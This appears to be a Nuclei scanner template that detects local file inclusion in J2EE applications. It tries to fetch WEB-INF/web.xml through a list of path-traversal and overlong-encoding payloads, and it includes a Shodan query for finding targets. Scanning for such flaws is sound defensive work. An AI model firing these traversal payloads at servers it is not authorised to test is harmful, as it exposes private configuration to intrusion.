id: generic-j2ee-lfi

info:
  name: Generic J2EE LFI Scan Panel - Detect
  author: davidfegyver
  severity: high
  description: Generic J2EE Scan panel was detected. Looks for J2EE specific LFI vulnerabilities; tries to leak the web.xml file.
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
  metadata:
    verified: true
    max-request: 13
    shodan-query: http.title:"J2EE"
  tags: lfi,generic,j2ee

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/../../../../WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml"
        - "/../../WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml;x="
        - "/../../WEB-INF/web.xml;x="
        - "/../WEB-INF/web.xml;x="
        - "/WEB-INF/web.xml"
        - "/.//WEB-INF/web.xml"
        - "/../WEB-INF/web.xml"
        - "/%c0%ae/WEB-INF/web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<servlet-name>"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200b07dcfde07789878d7496bda4e3f0321b7c3aa902236b808d1066377703c1570220154d638ec8b1d02440e5a960d2a91b56f7c8e97673fa21aa8c839e1ebaff68fb:922c64590222798bb761d5b6d8e72950